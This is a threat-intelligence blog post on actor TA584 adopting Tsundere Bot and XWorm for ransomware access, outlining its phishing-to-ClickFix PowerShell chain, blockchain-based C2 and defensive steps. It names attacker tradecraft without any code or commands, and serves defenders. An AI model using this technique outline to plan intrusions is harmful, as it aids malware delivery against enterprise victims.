TA584 Shifts to Tsundere Bot for Ransomware Operations

January 29, 2026 Faeem BLOGS 0

A prolific initial access broker (IAB) tracked as TA584 has adopted the Tsundere Bot malware alongside XWorm RAT to gain footholds in enterprise networks, setting the stage for ransomware attacks.

Key Findings

  • Actor: TA584 (active since 2020, tracked by Proofpoint).
  • Recent activity: Tripled in volume in late 2025 compared to Q1.
  • Target regions: Expanded beyond North America & UK/Ireland → now includes Germany, wider Europe, and Australia.
  • Attack chain:
    1. Emails sent via compromised accounts (using SendGrid and Amazon SES).
    2. Redirect chains with traffic direction systems (TDS) like Keitaro.
    3. CAPTCHA page → ClickFix page instructing victims to run a PowerShell command.
    4. Command loads XWorm or Tsundere Bot into memory, then redirects to a benign site for deception.

Tsundere Bot – Capabilities

  • Type: Malware-as-a-Service (MaaS) backdoor + loader.
  • Requirements: Installs Node.js via C2-generated installers.
  • C2 infrastructure:
    • Retrieves addresses from the Ethereum blockchain (EtherHiding technique).
    • Includes hardcoded fallback addresses.
    • Communicates via WebSockets.
  • Features:
    • System profiling (OS, RAM, drivers, network info).
    • Arbitrary JavaScript execution from C2.
    • SOCKS proxy support (infected hosts used as relays).
    • Locale check → aborts if CIS languages detected (esp. Russian).
    • Built-in marketplace for buying/selling infected bots.

Threat Context

  • Origins: First documented by Kaspersky in 2025, linked to 123 Stealer malware.
  • Capabilities: Information gathering, data exfiltration, lateral movement, payload installation.
  • Payload diversity: TA584 has historically deployed Ursnif, WarmCookie, Xeno RAT, Cobalt Strike, DCRAT, and more.
  • Ransomware risk: Proofpoint assesses with high confidence that Tsundere Bot infections can escalate into ransomware incidents.

Defensive Recommendations

  • Email security: Harden against phishing from compromised accounts; monitor for unusual SES/SendGrid traffic.
  • Endpoint monitoring: Detect suspicious PowerShell execution chains and Node.js installations.
  • Blockchain monitoring: Watch for EtherHiding-based C2 retrieval attempts.
  • Network defense: Inspect WebSocket traffic and SOCKS proxy activity.
  • Threat hunting: Look for ClickFix-style lures and CAPTCHA → PowerShell execution patterns.

Takeaway

TA584’s adoption of Tsundere Bot reflects the growing use of malware-as-a-service platforms that combine stealthy loaders, blockchain-based C2, and resale markets. This evolution makes initial access brokers more dangerous, as infections can quickly pivot into ransomware deployment.

Be the first to comment

Leave a Reply

Your email address will not be published.


*


This site uses Akismet to reduce spam. Learn how your comment data is processed.